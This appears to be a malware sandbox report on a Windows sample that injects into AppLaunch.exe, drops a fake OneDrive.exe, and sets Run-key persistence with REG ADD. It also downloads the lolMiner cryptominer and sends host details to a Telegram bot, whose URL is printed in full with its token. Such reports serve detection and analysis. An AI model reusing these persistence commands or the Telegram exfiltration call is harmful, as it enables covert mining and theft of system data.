Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
25/12/2024, 14:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
-
Size
6.6MB
-
MD5
a4ac4ea53e40133a5295125f42b8f44b
-
SHA1
23515fa205d9552ff9be7c97e4779051e8d3efd6
-
SHA256
5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce
-
SHA512
a22a828f23b4add05183c3ae0f3f2fff76991e098b343a2cf34b02d70be72d8d89812ee348f6a0db642450ff29e831d1ff3ff59d427428f737a31bb98b8a874c
-
SSDEEP
196608:Qv4oFqOMRr29c9lNxQp2QzenyEUBiI+8WO82a3EXfyoo6Y8W/W:i4oFqth9vxQp20TV/8r3cfyos8
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2916 OneDrive.exe -
Loads dropped DLL 8 IoCs
pid Process 3060 AppLaunch.exe 2916 OneDrive.exe 296 WerFault.exe 296 WerFault.exe 296 WerFault.exe 296 WerFault.exe 296 WerFault.exe 296 WerFault.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" REG.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2840 set thread context of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2764 REG.exe 2792 REG.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3060 AppLaunch.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 2840 wrote to memory of 3060 2840 JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe 31 PID 3060 wrote to memory of 2916 3060 AppLaunch.exe 32 PID 3060 wrote to memory of 2916 3060 AppLaunch.exe 32 PID 3060 wrote to memory of 2916 3060 AppLaunch.exe 32 PID 3060 wrote to memory of 2916 3060 AppLaunch.exe 32 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2764 3060 AppLaunch.exe 33 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 3060 wrote to memory of 2792 3060 AppLaunch.exe 34 PID 2916 wrote to memory of 296 2916 OneDrive.exe 37 PID 2916 wrote to memory of 296 2916 OneDrive.exe 37 PID 2916 wrote to memory of 296 2916 OneDrive.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2916 -s 7524⤵
- Loads dropped DLL
PID:296
-
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2764
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 0200000000000000000000003⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2792
-
-
Network
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.59.81
-
Remote address:34.117.59.81:80RequestGET /json HTTP/1.1
Accept: text/*
User-Agent: soft
Host: ipinfo.io
ResponseHTTP/1.1 200 OK
Content-Length: 253
content-type: application/json; charset=utf-8
date: Wed, 25 Dec 2024 14:04:50 GMT
x-content-type-options: nosniff
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
GEThttp://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zipOneDrive.exeRemote address:20.26.156.215:80RequestGET /Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip HTTP/1.1
Accept: text/*
User-Agent: soft
Host: github.com
ResponseHTTP/1.1 301 Moved Permanently
Location: https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
-
GEThttp://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0AAppLaunch.exeRemote address:149.154.167.220:80RequestGET /bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A HTTP/1.1
Accept: text/*
User-Agent: soft
Host: api.telegram.org
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 25 Dec 2024 14:04:51 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
-
303 B 654 B 5 3
HTTP Request
GET http://ipinfo.io/jsonHTTP Response
200 -
20.26.156.215:80http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.ziphttpOneDrive.exe376 B 252 B 5 2
HTTP Request
GET http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zipHTTP Response
301 -
149.154.167.220:80http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0AhttpAppLaunch.exe833 B 1.9kB 6 4
HTTP Request
GET http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0AHTTP Response
301 -
190 B 92 B 4 2
-
397 B 219 B 5 5
-
359 B 219 B 5 5
-
288 B 219 B 5 5
-
190 B 92 B 4 2
-
55 B 71 B 1 1
DNS Request
ipinfo.io
DNS Response
34.117.59.81
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
20.26.156.215
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5c48d171e301f77a3277b41f67834adf7
SHA10adf07159363866cddf94887eb1b74b9d0379279
SHA256f8dbb84201032c8b6f1ff2de441c3867223af89200e759cc1d7cd00bd8475ad5
SHA5127188011d238f06db092237f7c9e737f7f7783d66f3841eb97454dd8a06f353ea5e13da52b8757bc56560d3336aa2eecf353598b88f5ff572695e58b74aa9d70d
-
Filesize
175KB
MD5f3af73070387fb75b19286826cc3126c
SHA17774854137d7ada89f3b4bdf67631456a1e74853
SHA256974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610
SHA512a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a
-
Filesize
316KB
MD5fed6517a5f84eecc29edee5586d7feeb
SHA156df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA2565075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA51245cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642